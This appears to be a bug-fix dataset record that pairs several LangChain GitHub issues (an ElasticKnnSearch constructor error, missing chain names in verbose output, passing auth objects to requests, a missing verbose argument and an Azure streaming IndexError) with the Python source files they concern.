~/dev/github/langchain/langchain/vectorstores/elastic_vector_search.py:183, in ElasticVectorSearch.add_texts(self, texts, metadatas, refresh_indices, **kwargs) 181 requests = [] 182 ids = [] --> 183 embeddings = self.embedding.embed_documents(list(texts)) 184 dim = len(embeddings[0]) 185 mapping = _default_text_mapping(dim) AttributeError: 'str' object has no attribute 'embed_documents' ``` which is a pretty weird error. This is because https://github.com/cdiddy77/langchain/blob/e74733ab9e5e307fd828ea600ea929a1cb24320f/langchain/vectorstores/elastic_vector_search.py#L294 invokes the __init__ of the calling class, in this case `ElasticKnnSearch` which takes parameters in a very different order. This calling of the wrong __init__ was always present, but the PR above added a subsequent called to add_texts, which is where the bogus embedding is referenced, causing the exception. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to repro: 1. Open docs/modules/indexes/vectorstores/examples/elasticsearch.ipynb 2. Modify as appropriate with elasticsearch_url, and further down, model_id, dims, cloud_id, username,password of elastic cloud deployment 3. Run until cell below "Test adding vectors" ### Expected behavior Not throw exception
https://github.com/langchain-ai/langchain/issues/6198
https://github.com/langchain-ai/langchain/pull/6199
854f3fe9b1ca1c3e097cb0ccd55d1406e9c04406
574698a5fb2adbc4b6eb20ffe11a949a4f3b0371
"2023-06-15T04:45:12Z"
python
"2023-07-13T23:55:20Z"
langchain/vectorstores/elastic_vector_search.py
"""Wrapper around Elasticsearch vector database.""" from __future__ import annotations import uuid from abc import ABC from typing import ( TYPE_CHECKING, Any, Dict, Iterable, List, Mapping, Optional, Tuple, Union, ) from langchain.docstore.document import Document from langchain.embeddings.base import Embeddings from langchain.utils import get_from_env from langchain.vectorstores.base import VectorStore if TYPE_CHECKING: from elasticsearch import Elasticsearch def _default_text_mapping(dim: int) -> Dict: return { "properties": { "text": {"type": "text"}, "vector": {"type": "dense_vector", "dims": dim}, } } def _default_script_query(query_vector: List[float], filter: Optional[dict]) -> Dict: if filter: ((key, value),) = filter.items() filter = {"match": {f"metadata.{key}.keyword": f"{value}"}} else: filter = {"match_all": {}} return { "script_score": { "query": filter, "script": { "source": "cosineSimilarity(params.query_vector, 'vector') + 1.0", "params": {"query_vector": query_vector}, }, } } # ElasticVectorSearch is a concrete implementation of the abstract base class # VectorStore, which defines a common interface for all vector database # implementations. By inheriting from the ABC class, ElasticVectorSearch can be # defined as an abstract base class itself, allowing the creation of subclasses with # their own specific implementations. If you plan to subclass ElasticVectorSearch, # you can inherit from it and define your own implementation of the necessary methods # and attributes. class ElasticVectorSearch(VectorStore, ABC): """Wrapper around Elasticsearch as a vector database. To connect to an Elasticsearch instance that does not require login credentials, pass the Elasticsearch URL and index name along with the embedding object to the constructor. Example: .. code-block:: python from langchain import ElasticVectorSearch from langchain.embeddings import OpenAIEmbeddings embedding = OpenAIEmbeddings() elastic_vector_search = ElasticVectorSearch( elasticsearch_url="http://localhost:9200", index_name="test_index", embedding=embedding ) To connect to an Elasticsearch instance that requires login credentials, including Elastic Cloud, use the Elasticsearch URL format https://username:password@es_host:9243. For example, to connect to Elastic Cloud, create the Elasticsearch URL with the required authentication details and pass it to the ElasticVectorSearch constructor as the named parameter elasticsearch_url. You can obtain your Elastic Cloud URL and login credentials by logging in to the Elastic Cloud console at https://cloud.elastic.co, selecting your deployment, and navigating to the "Deployments" page. To obtain your Elastic Cloud password for the default "elastic" user: 1. Log in to the Elastic Cloud console at https://cloud.elastic.co 2. Go to "Security" > "Users" 3. Locate the "elastic" user and click "Edit" 4. Click "Reset password" 5. Follow the prompts to reset the password The format for Elastic Cloud URLs is https://username:password@cluster_id.region_id.gcp.cloud.es.io:9243. Example: .. code-block:: python from langchain import ElasticVectorSearch from langchain.embeddings import OpenAIEmbeddings embedding = OpenAIEmbeddings() elastic_host = "cluster_id.region_id.gcp.cloud.es.io" elasticsearch_url = f"https://username:password@{elastic_host}:9243" elastic_vector_search = ElasticVectorSearch( elasticsearch_url=elasticsearch_url, index_name="test_index", embedding=embedding ) Args: elasticsearch_url (str): The URL for the Elasticsearch instance. index_name (str): The name of the Elasticsearch index for the embeddings. embedding (Embeddings): An object that provides the ability to embed text. It should be an instance of a class that subclasses the Embeddings abstract base class, such as OpenAIEmbeddings() Raises: ValueError: If the elasticsearch python package is not installed. """ def __init__( self, elasticsearch_url: str, index_name: str, embedding: Embeddings, *, ssl_verify: Optional[Dict[str, Any]] = None, ): """Initialize with necessary components.""" try: import elasticsearch except ImportError: raise ImportError( "Could not import elasticsearch python package. " "Please install it with `pip install elasticsearch`." ) self.embedding = embedding self.index_name = index_name _ssl_verify = ssl_verify or {} try: self.client = elasticsearch.Elasticsearch(elasticsearch_url, **_ssl_verify) except ValueError as e: raise ValueError( f"Your elasticsearch client string is mis-formatted. Got error: {e} " ) def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, refresh_indices: bool = True, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. ids: Optional list of unique IDs. refresh_indices: bool to refresh ElasticSearch indices Returns: List of ids from adding the texts into the vectorstore. """ try: from elasticsearch.exceptions import NotFoundError from elasticsearch.helpers import bulk except ImportError: raise ImportError( "Could not import elasticsearch python package. " "Please install it with `pip install elasticsearch`." ) requests = [] ids = ids or [str(uuid.uuid4()) for _ in texts] embeddings = self.embedding.embed_documents(list(texts)) dim = len(embeddings[0]) mapping = _default_text_mapping(dim) # check to see if the index already exists try: self.client.indices.get(index=self.index_name) except NotFoundError: # TODO would be nice to create index before embedding, # just to save expensive steps for last self.create_index(self.client, self.index_name, mapping) for i, text in enumerate(texts): metadata = metadatas[i] if metadatas else {} request = { "_op_type": "index", "_index": self.index_name, "vector": embeddings[i], "text": text, "metadata": metadata, "_id": ids[i], } requests.append(request) bulk(self.client, requests) if refresh_indices: self.client.indices.refresh(index=self.index_name) return ids def similarity_search( self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any ) -> List[Document]: """Return docs most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. Returns: List of Documents most similar to the query. """ docs_and_scores = self.similarity_search_with_score(query, k, filter=filter) documents = [d[0] for d in docs_and_scores] return documents def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any ) -> List[Tuple[Document, float]]: """Return docs most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. Returns: List of Documents most similar to the query. """ embedding = self.embedding.embed_query(query) script_query = _default_script_query(embedding, filter) response = self.client_search( self.client, self.index_name, script_query, size=k ) hits = [hit for hit in response["hits"]["hits"]] docs_and_scores = [ ( Document( page_content=hit["_source"]["text"], metadata=hit["_source"]["metadata"], ), hit["_score"], ) for hit in hits ] return docs_and_scores @classmethod def from_texts( cls, texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, elasticsearch_url: Optional[str] = None, index_name: Optional[str] = None, refresh_indices: bool = True, **kwargs: Any, ) -> ElasticVectorSearch: """Construct ElasticVectorSearch wrapper from raw documents. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new index for the embeddings in the Elasticsearch instance. 3. Adds the documents to the newly created Elasticsearch index. This is intended to be a quick way to get started. Example: .. code-block:: python from langchain import ElasticVectorSearch from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() elastic_vector_search = ElasticVectorSearch.from_texts( texts, embeddings, elasticsearch_url="http://localhost:9200" ) """ elasticsearch_url = elasticsearch_url or get_from_env( "elasticsearch_url", "ELASTICSEARCH_URL" ) index_name = index_name or uuid.uuid4().hex vectorsearch = cls(elasticsearch_url, index_name, embedding, **kwargs) vectorsearch.add_texts( texts, metadatas=metadatas, ids=ids, refresh_indices=refresh_indices ) return vectorsearch def create_index(self, client: Any, index_name: str, mapping: Dict) -> None: version_num = client.info()["version"]["number"][0] version_num = int(version_num) if version_num >= 8: client.indices.create(index=index_name, mappings=mapping) else: client.indices.create(index=index_name, body={"mappings": mapping}) def client_search( self, client: Any, index_name: str, script_query: Dict, size: int ) -> Any: version_num = client.info()["version"]["number"][0] version_num = int(version_num) if version_num >= 8: response = client.search(index=index_name, query=script_query, size=size) else: response = client.search( index=index_name, body={"query": script_query, "size": size} ) return response def delete(self, ids: Optional[List[str]] = None, **kwargs: Any) -> None: """Delete by vector IDs. Args: ids: List of ids to delete. """ if ids is None: raise ValueError("No ids provided to delete.") # TODO: Check if this can be done in bulk for id in ids: self.client.delete(index=self.index_name, id=id) class ElasticKnnSearch(ElasticVectorSearch): """ A class for performing k-Nearest Neighbors (k-NN) search on an Elasticsearch index. The class is designed for a text search scenario where documents are text strings and their embeddings are vector representations of those strings. """ def __init__( self, index_name: str, embedding: Embeddings, es_connection: Optional["Elasticsearch"] = None, es_cloud_id: Optional[str] = None, es_user: Optional[str] = None, es_password: Optional[str] = None, vector_query_field: Optional[str] = "vector", query_field: Optional[str] = "text", ): """ Initializes an instance of the ElasticKnnSearch class and sets up the Elasticsearch client. Args: index_name: The name of the Elasticsearch index. embedding: An instance of the Embeddings class, used to generate vector representations of text strings. es_connection: An existing Elasticsearch connection. es_cloud_id: The Cloud ID of the Elasticsearch instance. Required if creating a new connection. es_user: The username for the Elasticsearch instance. Required if creating a new connection. es_password: The password for the Elasticsearch instance. Required if creating a new connection. """ try: import elasticsearch except ImportError: raise ImportError( "Could not import elasticsearch python package. " "Please install it with `pip install elasticsearch`." ) self.embedding = embedding self.index_name = index_name self.query_field = query_field self.vector_query_field = vector_query_field # If a pre-existing Elasticsearch connection is provided, use it. if es_connection is not None: self.client = es_connection else: # If credentials for a new Elasticsearch connection are provided, # create a new connection. if es_cloud_id and es_user and es_password: self.client = elasticsearch.Elasticsearch( cloud_id=es_cloud_id, basic_auth=(es_user, es_password) ) else: raise ValueError( """Either provide a pre-existing Elasticsearch connection, \ or valid credentials for creating a new connection.""" ) @staticmethod def _default_knn_mapping(dims: int) -> Dict: """Generates a default index mapping for kNN search.""" return { "properties": { "text": {"type": "text"}, "vector": { "type": "dense_vector", "dims": dims, "index": True, "similarity": "dot_product", }, } } def _default_knn_query( self, query_vector: Optional[List[float]] = None, query: Optional[str] = None, model_id: Optional[str] = None, k: Optional[int] = 10, num_candidates: Optional[int] = 10, ) -> Dict: knn: Dict = { "field": self.vector_query_field, "k": k, "num_candidates": num_candidates, } # Case 1: `query_vector` is provided, but not `model_id` -> use query_vector if query_vector and not model_id: knn["query_vector"] = query_vector # Case 2: `query` and `model_id` are provided, -> use query_vector_builder elif query and model_id: knn["query_vector_builder"] = { "text_embedding": { "model_id": model_id, # use 'model_id' argument "model_text": query, # use 'query' argument } } else: raise ValueError( "Either `query_vector` or `model_id` must be provided, but not both." ) return knn def knn_search( self, query: Optional[str] = None, k: Optional[int] = 10, query_vector: Optional[List[float]] = None, model_id: Optional[str] = None, size: Optional[int] = 10, source: Optional[bool] = True, fields: Optional[ Union[List[Mapping[str, Any]], Tuple[Mapping[str, Any], ...], None] ] = None, ) -> Dict: """ Performs a k-nearest neighbor (k-NN) search on the Elasticsearch index. The search can be conducted using either a raw query vector or a model ID. The method first generates the body of the search query, which can be interpreted by Elasticsearch. It then performs the k-NN search on the Elasticsearch index and returns the results. Args: query: The query or queries to be used for the search. Required if `query_vector` is not provided. k: The number of nearest neighbors to return. Defaults to 10. query_vector: The query vector to be used for the search. Required if `query` is not provided. model_id: The ID of the model to use for generating the query vector, if `query` is provided. size: The number of search hits to return. Defaults to 10. source: Whether to include the source of each hit in the results. fields: The fields to include in the source of each hit. If None, all fields are included. vector_query_field: Field name to use in knn search if not default 'vector' Returns: The search results. Raises: ValueError: If neither `query_vector` nor `model_id` is provided, or if both are provided. """ knn_query_body = self._default_knn_query( query_vector=query_vector, query=query, model_id=model_id, k=k ) # Perform the kNN search on the Elasticsearch index and return the results. res = self.client.search( index=self.index_name, knn=knn_query_body, size=size, source=source, fields=fields, ) return dict(res) def knn_hybrid_search( self, query: Optional[str] = None, k: Optional[int] = 10, query_vector: Optional[List[float]] = None, model_id: Optional[str] = None, size: Optional[int] = 10, source: Optional[bool] = True, knn_boost: Optional[float] = 0.9, query_boost: Optional[float] = 0.1, fields: Optional[ Union[List[Mapping[str, Any]], Tuple[Mapping[str, Any], ...], None] ] = None, ) -> Dict[Any, Any]: """Performs a hybrid k-nearest neighbor (k-NN) and text-based search on the Elasticsearch index. The search can be conducted using either a raw query vector or a model ID. The method first generates the body of the k-NN search query and the text-based query, which can be interpreted by Elasticsearch. It then performs the hybrid search on the Elasticsearch index and returns the results. Args: query: The query or queries to be used for the search. Required if `query_vector` is not provided. k: The number of nearest neighbors to return. Defaults to 10. query_vector: The query vector to be used for the search. Required if `query` is not provided. model_id: The ID of the model to use for generating the query vector, if `query` is provided. size: The number of search hits to return. Defaults to 10. source: Whether to include the source of each hit in the results. knn_boost: The boost factor for the k-NN part of the search. query_boost: The boost factor for the text-based part of the search. fields The fields to include in the source of each hit. If None, all fields are included. Defaults to None. vector_query_field: Field name to use in knn search if not default 'vector' query_field: Field name to use in search if not default 'text' Returns: The search results. Raises: ValueError: If neither `query_vector` nor `model_id` is provided, or if both are provided. """ knn_query_body = self._default_knn_query( query_vector=query_vector, query=query, model_id=model_id, k=k ) # Modify the knn_query_body to add a "boost" parameter knn_query_body["boost"] = knn_boost # Generate the body of the standard Elasticsearch query match_query_body = { "match": {self.query_field: {"query": query, "boost": query_boost}} } # Perform the hybrid search on the Elasticsearch index and return the results. res = self.client.search( index=self.index_name, query=match_query_body, knn=knn_query_body, fields=fields, size=size, source=source, ) return dict(res)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,524
Specific name of the current chain is not displayed
### System Info LangChain v0.0.229, Python v3.10.12, Ubuntu 20.04.2 LTS ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction I am encountering an issue where the specific name of the current chain is not being displayed in the console output, even though I have set 'verbose=True' in the MultiPromptChain and other Chains. When the program enters a new chain, it only prints 'Entering new chain...' without specifying the name of the chain. This makes it difficult to debug and understand which chain is currently being used. Could you please look into this issue and provide a way to display the name of the current chain in the console output? Thank you. The output could be ``` > Entering new chain... > Entering new chain... lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain. warnings.warn( > Finished chain. math: {'input': 'What is the derivative of a function?'} > Entering new chain... Prompt after formatting: You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question. Here is a question: What is the derivative of a function? > Finished chain. > Finished chain. ``` ### Expected behavior ``` > Entering new MultiPromptChain chain... > Entering new LLMRouterChain chain... lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain. warnings.warn( > Finished chain. math: {'input': 'What is the derivative of a function?'} > Entering new LLMChain[math] chain... Prompt after formatting: You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question. Here is a question: What is the derivative of a function? > Finished chain. > Finished chain. ```
https://github.com/langchain-ai/langchain/issues/7524
https://github.com/langchain-ai/langchain/pull/7687
3874bb256e09d377032ae54b1592ca3dd7cf9e4d
af6d333147db0af7d558a4a66d6c2752b6027204
"2023-07-11T08:28:40Z"
python
"2023-07-14T02:39:21Z"
langchain/callbacks/file.py
"""Callback Handler that writes to a file.""" from typing import Any, Dict, Optional, TextIO, cast from langchain.callbacks.base import BaseCallbackHandler from langchain.input import print_text from langchain.schema import AgentAction, AgentFinish class FileCallbackHandler(BaseCallbackHandler): """Callback Handler that writes to a file.""" def __init__( self, filename: str, mode: str = "a", color: Optional[str] = None ) -> None: """Initialize callback handler.""" self.file = cast(TextIO, open(filename, mode)) self.color = color def __del__(self) -> None: """Destructor to cleanup when done.""" self.file.close() def on_chain_start( self, serialized: Dict[str, Any], inputs: Dict[str, Any], **kwargs: Any ) -> None: """Print out that we are entering a chain.""" class_name = serialized["name"] print_text( f"\n\n\033[1m> Entering new {class_name} chain...\033[0m", end="\n", file=self.file, ) def on_chain_end(self, outputs: Dict[str, Any], **kwargs: Any) -> None: """Print out that we finished a chain.""" print_text("\n\033[1m> Finished chain.\033[0m", end="\n", file=self.file) def on_agent_action( self, action: AgentAction, color: Optional[str] = None, **kwargs: Any ) -> Any: """Run on agent action.""" print_text(action.log, color=color or self.color, file=self.file) def on_tool_end( self, output: str, color: Optional[str] = None, observation_prefix: Optional[str] = None, llm_prefix: Optional[str] = None, **kwargs: Any, ) -> None: """If not the final action, print out observation.""" if observation_prefix is not None: print_text(f"\n{observation_prefix}", file=self.file) print_text(output, color=color or self.color, file=self.file) if llm_prefix is not None: print_text(f"\n{llm_prefix}", file=self.file) def on_text( self, text: str, color: Optional[str] = None, end: str = "", **kwargs: Any ) -> None: """Run when agent ends.""" print_text(text, color=color or self.color, end=end, file=self.file) def on_agent_finish( self, finish: AgentFinish, color: Optional[str] = None, **kwargs: Any ) -> None: """Run on agent end.""" print_text(finish.log, color=color or self.color, end="\n", file=self.file)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,542
Issue: Passing auth object to LLMRequestsChain
### Issue you'd like to raise. Accessing many corporate resources requires special authentication, e.g. Kerberos. The `requests` library supports passing an auth object, e.g. `requests.get(url, auth=HttpNegotiateAuth(), verify=False)` to use SSPI. We're able to pass a `requests_wrapper `to `LLMRequestsChain`, but it only allows changing headers, not the actual get method that is used. ### Suggestion: Allow for more generic generic wrappers to be passed? Allow passing a requests-compatible auth object?
https://github.com/langchain-ai/langchain/issues/7542
https://github.com/langchain-ai/langchain/pull/7701
1e40427755f3034c5c411c1d0a921cdb3e13849d
663b0933e488383e6a9bc2a04b4b1cf866a8ea94
"2023-07-11T13:59:38Z"
python
"2023-07-14T12:38:24Z"
langchain/requests.py
"""Lightweight wrapper around requests library, with async support.""" from contextlib import asynccontextmanager from typing import Any, AsyncGenerator, Dict, Optional import aiohttp import requests from pydantic import BaseModel, Extra class Requests(BaseModel): """Wrapper around requests to handle auth and async. The main purpose of this wrapper is to handle authentication (by saving headers) and enable easy async methods on the same base object. """ headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True def get(self, url: str, **kwargs: Any) -> requests.Response: """GET the URL and return the text.""" return requests.get(url, headers=self.headers, **kwargs) def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """POST to the URL and return the text.""" return requests.post(url, json=data, headers=self.headers, **kwargs) def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PATCH the URL and return the text.""" return requests.patch(url, json=data, headers=self.headers, **kwargs) def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PUT the URL and return the text.""" return requests.put(url, json=data, headers=self.headers, **kwargs) def delete(self, url: str, **kwargs: Any) -> requests.Response: """DELETE the URL and return the text.""" return requests.delete(url, headers=self.headers, **kwargs) @asynccontextmanager async def _arequest( self, method: str, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """Make an async request.""" if not self.aiosession: async with aiohttp.ClientSession() as session: async with session.request( method, url, headers=self.headers, **kwargs ) as response: yield response else: async with self.aiosession.request( method, url, headers=self.headers, **kwargs ) as response: yield response @asynccontextmanager async def aget( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """GET the URL and return the text asynchronously.""" async with self._arequest("GET", url, **kwargs) as response: yield response @asynccontextmanager async def apost( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """POST to the URL and return the text asynchronously.""" async with self._arequest("POST", url, json=data, **kwargs) as response: yield response @asynccontextmanager async def apatch( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PATCH the URL and return the text asynchronously.""" async with self._arequest("PATCH", url, json=data, **kwargs) as response: yield response @asynccontextmanager async def aput( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PUT the URL and return the text asynchronously.""" async with self._arequest("PUT", url, json=data, **kwargs) as response: yield response @asynccontextmanager async def adelete( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """DELETE the URL and return the text asynchronously.""" async with self._arequest("DELETE", url, **kwargs) as response: yield response class TextRequestsWrapper(BaseModel): """Lightweight wrapper around requests library. The main purpose of this wrapper is to always return a text output. """ headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def requests(self) -> Requests: return Requests(headers=self.headers, aiosession=self.aiosession) def get(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text.""" return self.requests.get(url, **kwargs).text def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text.""" return self.requests.post(url, data, **kwargs).text def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text.""" return self.requests.patch(url, data, **kwargs).text def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text.""" return self.requests.put(url, data, **kwargs).text def delete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text.""" return self.requests.delete(url, **kwargs).text async def aget(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text asynchronously.""" async with self.requests.aget(url, **kwargs) as response: return await response.text() async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text asynchronously.""" async with self.requests.apost(url, data, **kwargs) as response: return await response.text() async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text asynchronously.""" async with self.requests.apatch(url, data, **kwargs) as response: return await response.text() async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text asynchronously.""" async with self.requests.aput(url, data, **kwargs) as response: return await response.text() async def adelete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text asynchronously.""" async with self.requests.adelete(url, **kwargs) as response: return await response.text() # For backwards compatibility RequestsWrapper = TextRequestsWrapper
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,982
TypeError: create_extraction_chain() got an unexpected keyword argument 'verbose'
### Feature request Almost all the chains offered in langchain framework support Verbose option which helps the developers understand what prompt is being applied under the hood and plan their work accordingly. It immensely help while debugging. create_extraction_chain is a very helpful one and I found this is not accepting verbose attribute. ### Motivation For many developers who are just following the langchain official documentation and not looking at the code used under the hood, this error will sound odd. Supporting this attribute will help in keeping things consistent and improve debugging feature of this chain ### Your contribution I can raise the PR for this ![Screenshot 2023-07-20 at 12 34 55 PM](https://github.com/hwchase17/langchain/assets/8801972/18b248df-1a7c-49cf-a9b1-3101e6928631)
https://github.com/langchain-ai/langchain/issues/7982
https://github.com/langchain-ai/langchain/pull/7984
812a1643db9daac573f77f7cdbce3fea90ba0507
d6493590da3977b5077c13ff3aaad591f71637d6
"2023-07-20T06:39:12Z"
python
"2023-07-20T13:52:13Z"
langchain/chains/openai_functions/extraction.py
from typing import Any, List from pydantic import BaseModel from langchain.chains.base import Chain from langchain.chains.llm import LLMChain from langchain.chains.openai_functions.utils import ( _convert_schema, _resolve_schema_references, get_llm_kwargs, ) from langchain.output_parsers.openai_functions import ( JsonKeyOutputFunctionsParser, PydanticAttrOutputFunctionsParser, ) from langchain.prompts import ChatPromptTemplate from langchain.schema.language_model import BaseLanguageModel def _get_extraction_function(entity_schema: dict) -> dict: return { "name": "information_extraction", "description": "Extracts the relevant information from the passage.", "parameters": { "type": "object", "properties": { "info": {"type": "array", "items": _convert_schema(entity_schema)} }, "required": ["info"], }, } _EXTRACTION_TEMPLATE = """Extract and save the relevant entities mentioned\ in the following passage together with their properties. Only extract the properties mentioned in the 'information_extraction' function. If a property is not present and is not required in the function parameters, do not include it in the output. Passage: {input} """ # noqa: E501 def create_extraction_chain(schema: dict, llm: BaseLanguageModel) -> Chain: """Creates a chain that extracts information from a passage. Args: schema: The schema of the entities to extract. llm: The language model to use. Returns: Chain that can be used to extract information from a passage. """ function = _get_extraction_function(schema) prompt = ChatPromptTemplate.from_template(_EXTRACTION_TEMPLATE) output_parser = JsonKeyOutputFunctionsParser(key_name="info") llm_kwargs = get_llm_kwargs(function) chain = LLMChain( llm=llm, prompt=prompt, llm_kwargs=llm_kwargs, output_parser=output_parser, ) return chain def create_extraction_chain_pydantic( pydantic_schema: Any, llm: BaseLanguageModel ) -> Chain: """Creates a chain that extracts information from a passage using pydantic schema. Args: pydantic_schema: The pydantic schema of the entities to extract. llm: The language model to use. Returns: Chain that can be used to extract information from a passage. """ class PydanticSchema(BaseModel): info: List[pydantic_schema] # type: ignore openai_schema = pydantic_schema.schema() openai_schema = _resolve_schema_references( openai_schema, openai_schema.get("definitions", {}) ) function = _get_extraction_function(openai_schema) prompt = ChatPromptTemplate.from_template(_EXTRACTION_TEMPLATE) output_parser = PydanticAttrOutputFunctionsParser( pydantic_schema=PydanticSchema, attr_name="info" ) llm_kwargs = get_llm_kwargs(function) chain = LLMChain( llm=llm, prompt=prompt, llm_kwargs=llm_kwargs, output_parser=output_parser, ) return chain
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6,462
AzureChatOpenAI Streaming causes IndexError: list index out of range
### System Info langchain-0.0.205-py3, macos ventura, python 3.11 ### Who can help? @hwchase17 / @agola11 ### Information - [x] The official example notebooks/scripts https://python.langchain.com/docs/modules/model_io/models/chat/how_to/streaming ### Related Components - [X] LLMs/Chat Models ### Reproduction ### Reproduction code ```python # test.py from langchain.chat_models import AzureChatOpenAI from langchain.chat_models import ChatOpenAI from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler from langchain.schema import ( HumanMessage, ) chat_1 = ChatOpenAI(streaming=True, callbacks=[StreamingStdOutCallbackHandler()], openai_api_key="SOME-KEY", model='gpt-3.5-turbo', temperature=0.7, request_timeout=60, max_retries=1) chat_2 = AzureChatOpenAI(streaming=True, callbacks=[StreamingStdOutCallbackHandler()], openai_api_base="https://some-org-openai.openai.azure.com/", openai_api_version="2023-06-01-preview", openai_api_key="SOME-KEY", deployment_name='gpt-3_5', temperature=0.7, request_timeout=60, max_retries=1) resp_1 = chat_1([HumanMessage(content="Write me a song about sparkling water.")]) resp_2 = chat_2([HumanMessage(content="Write me a song about sparkling water.")]) ``` ```shell python test.py ``` ### Output of command 1 (OpenAI) ```shell Verse 1: Bubbles dancing in my cup Refreshing taste, can't get enough Clear and crisp, it's always there A drink that's beyond compare Chorus: Sparkling water, oh how you shine You make my taste buds come alive With every sip, I feel so fine Sparkling water, you're one of a kind Verse 2: A drink that's light and calorie-free A healthier choice, it's plain to see A perfect thirst quencher, day or night With sparkling water, everything's right Chorus: Sparkling water, oh how you shine You make my taste buds come alive With every sip, I feel so fine Sparkling water, you're one of a kind Bridge: From the fizzy sensation to the bubbles popping You're the drink I never want to stop sipping Whether at a party or on my own Sparkling water, you're always in the zone Chorus: Sparkling water, oh how you shine You make my taste buds come alive With every sip, I feel so fine Sparkling water, you're one of a kind Outro: Sparkling water, you're my go-to A drink that always feels brand new With each sip, I'm left in awe Sparkling water, you're the perfect beverage ``` ### Output of command 2 (Azure OpenAI) ```shell raw.Traceback (most recent call last): File "/Users/someone/Development/test.py", line 29, in <module> resp_2 = chat_2([HumanMessage(content="Write me a song about sparkling water.")]) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 208, in __call__ generation = self.generate( ^^^^^^^^^^^^^^ File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 102, in generate raise e File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 94, in generate results = [ ^ File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 95, in <listcomp> self._generate(m, stop=stop, run_manager=run_manager, **kwargs) File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/openai.py", line 334, in _generate role = stream_resp["choices"][0]["delta"].get("role", role) ~~~~~~~~~~~~~~~~~~~~~~^^^ IndexError: list index out of range ``` ### Expected behavior I can't find anything in existing issues or documentation stating that there is a known bug in the AzureOpenAI Service Streaming.
https://github.com/langchain-ai/langchain/issues/6462
https://github.com/langchain-ai/langchain/pull/8241
c1ea8da9bc2986532d6f1db810996ee72d5a6c1c
0af48b06d00b23be65d0a10ff27aff4db0f6c85f
"2023-06-20T04:57:00Z"
python
"2023-07-25T18:30:22Z"
libs/langchain/langchain/chat_models/openai.py
